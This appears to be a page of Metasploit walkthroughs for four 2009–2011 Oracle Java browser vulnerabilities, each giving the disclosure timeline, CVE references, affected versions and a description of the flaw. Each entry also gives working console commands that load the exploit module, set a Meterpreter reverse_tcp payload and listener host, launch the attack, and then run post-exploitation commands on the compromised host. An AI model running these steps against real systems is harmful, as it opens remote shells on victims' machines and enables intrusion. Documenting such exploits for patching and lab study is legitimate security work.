Timeline :

Vulnerability discovered by Frederic Hoguin
Vulnerability transmitted to ZDI by Frederic Hoguin
Vulnerability reported to the vendor by ZDI the 2010-09-28
Coordinated public release of advisory the 2011-02-15
Vulnerability details publicly released by Frederic Hoguin the 2011-03-11
Metasploit PoC provided the 2011-03-15

PoC provided by :

Frederic Hoguin
jduck

Reference(s) :

CVE-2010-4452
ZDI-11-084
OSVDB-71193
Oracle

Affected version(s) :

Oracle JRE 6 & JDK 6 Update 23 and before

Tested on Windows XP SP3 with :

Oracle JRE 6 Update 16

Description :

This module exploits a vulnerability in the Java Runtime Environment that allows an attacker to run an applet outside of the Java Sandbox. When an applet is invoked with: 1. A “codebase” parameter that points at a trusted directory 2. A “code” parameter that is a URL that does not contain any dots the applet will run outside of the sandbox.

Commands :

use exploit/windows/browser/java_codebase_trust
set SRVHOST 192.168.178.21
set PAYLOAD java/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sysinfo
getuid

Timeline :

Vulnerability discovered by Stephen Fewer and submitted to ZDI
Vulnerability reported to the vendor by ZDI the 2010-07-20
PoC provided by berendjanwever the 2010-08-31
Coordinated vulnerability disclosure the 2010-10-12
Metasploit PoC provided the 2010-10-25

PoC provided by :

jduck

Reference(s) :

CVE-2010-3552
ZDI-10-206

Affected version(s) :

All Oracle JRE versions previous version 6 update 22.

Tested on Windows XP SP3 with

Oracle JRE 6 Update 20

Description :

This module exploits a flaw in the new plugin component of the Sun Java Runtime Environment before v6 Update 22. By specifying specific parameters to the new plugin, an attacker can cause a stack-based buffer overflow and execute arbitrary code. When the new plugin is invoked with a “launchjnlp” parameter, it will copy the contents of the “docbase” parameter to a stack-buffer using the “sprintf” function. A string of 396 bytes is enough to overflow the 256 byte stack buffer and overwrite some local variables as well as the saved return address. NOTE: The string being copied is first passed through the “WideCharToMultiByte”. Due to this, only characters which have a valid localized multibyte representation are allowed. Invalid characters will be replaced with question marks (‘?’). This vulnerability was originally discovered independently by both Stephen Fewer and Berend Jan Wever (SkyLined). Although exhaustive testing hasn’t been done, all versions since version 6 Update 10 are believed to be affected by this vulnerability. This vulnerability was patched as part of the October 2010 Oracle Patch release.

Commands :

use exploit/windows/browser/java_docbase_bof
set SRVHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sessions -i 1
sysinfo
getuid
ipconfig

Timeline :

Vulnerability reported to Oracle by ZDI the 2009-10-21
Coordinated public release of advisory the 2010-04-05
Metasploit PoC provided by hdm the 2010-09-08

PoC provided by :

Sami Koivu
Matthias Kaiser
egypt

Reference(s) :

CVE-2010-0094
ZDI-10-051

Affected version(s) :

Java 6 Standard Edition prior to update 19
Java 5 Standard Edition prior to update 23

Tested on Windows XP SP3 with :

Java 6 Standard Edition Update 18

Description :

This module exploits a vulnerability in the Java Runtime Environment that allows to deserialize a MarshalledObject containing a custom classloader under a privileged context. The vulnerability affects version 6 prior to update 19 and version 5 prior to update 23.

Commands :

use multi/browser/java_rmi_connection_impl
set SRVHOST 192.168.178.21
set PAYLOAD java/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sessions -i 1
sysinfo
getuid
ipconfig

Timeline :

Vulnerability reported to Oracle by ZDI the 2009-11-24
Coordinated public release of advisory the 2010-04-05
Metasploit PoC provided by hdm the 2010-08-20

PoC provided by :

Sami Koivu
Matthias Kaiser
egypt

Reference(s) :

CVE-2010-0840
ZDI-10-056

Affected version(s) :

Java 6 Standard Edition prior to update 19
Java 5 Standard Edition prior to update 23

Tested on Windows XP SP3 with :

Java 6 Standard Edition Update 18

Description :

This module exploits a vulnerability in Java Runtime Environment that allows an untrusted method to run in a privileged context. The vulnerability affects version 6 prior to update 19 and version 5 prior to update 23.

Commands :

use multi/browser/java_trusted_chain
set SRVHOST 192.168.178.21
set PAYLOAD java/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sessions -i 1
sysinfo
getuid
ipconfig